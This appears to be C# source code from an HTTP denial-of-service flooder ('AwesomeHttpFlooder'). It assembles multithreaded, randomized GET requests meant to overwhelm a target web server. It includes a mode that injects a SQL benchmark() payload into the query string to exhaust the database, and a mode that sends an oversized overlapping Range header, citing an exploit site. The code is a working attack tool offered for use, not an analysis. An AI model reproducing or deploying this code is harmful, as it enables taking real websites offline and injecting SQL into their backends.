public AwesomeHttpFlooder(IPEndPoint target, HttpAttackParams attackParams, int threadCount = 1)
{
var info = new AttackInfo {
Target = target,
Protocol = ProtocolType.Tcp,
Randomizer = this.GenerateHeaderBytes,
MaxWrite = 1,
SendBufferSize = 512,
ReadBufferSize = 512
};
if (attackParams.WaitForResponse)
{
info.MaxRead = ulong.MaxValue;
}
_flooder = new AsyncFlooder(info, threadCount);
this._headers = CreateHeaderExpression(attackParams);
this._exprBuffers = new int[threadCount][];
var c = this._headers.ComputeLengthDataSize();
for (var i = 0; i < threadCount; i++)
{
this._exprBuffers[i] = new int[c];
}
}
private static MultiExpression CreateHeaderExpression(HttpAttackParams p)
{
var query = p.Query;
if (p.AttackType == HttpAttackType.RefRef)
{
query += "%20and%20(select+benchmark({I:D:999999:999999999},0x{S:H:48:48}))";
}
var bld = new StringBuilder();
bld.AppendFormat("GET {0}{1} HTTP/1.1", query, p.RandomAppendUrl ? "{R:{&{S:L:1:5}={S:U:1:50}}:0:3}" :"");
bld.AppendLine();
//subdomains
bld.AppendFormat("Host: {0}{1}", p.RandomAppendHost?"{R:{{S:a:3:12}.}:0:2}":"", p.Dns);
bld.AppendLine();
bld.AppendLine("Accept: */*");
bld.AppendLine("Connection: close");
if (p.Gzip)
{
bld.AppendLine("Accept-Encoding: gzip,deflate");
}
//all versions of chrome and safari
bld.AppendLine("Mozilla/5.0 (Windows NT 6.{I:D:0:2}) AppleWebKit/{I:D:536:537}.{I:D:0:35}" +
" (KHTML, like Gecko) Chrome/{I:D:25:35}.0.{I:D:1100:1800}.{I:D:0:10}" +
" Safari/{I:D:536:537}.{I:D:0:35}");
//lot's of http range requests
//Moar info: http://1337day.com/exploits/16729
if (p.AttackType == HttpAttackType.AhrDosme)
{
bld.Append("Range:bytes=");
var l = Generators.Random.Next(600, 1000);
var l2 = Generators.Random.Next(30);
for (var i = 0; i < l; i++)
{
bld.Append(l2 >> 1 + (i % l2));
bld.Append('-');
bld.Append(i);
if (i < l - 1)
{
bld.Append(',');
}
}
bld.AppendLine();
}
bld.AppendLine();
return(ExpressionParser.Create(bld.ToString()));
}
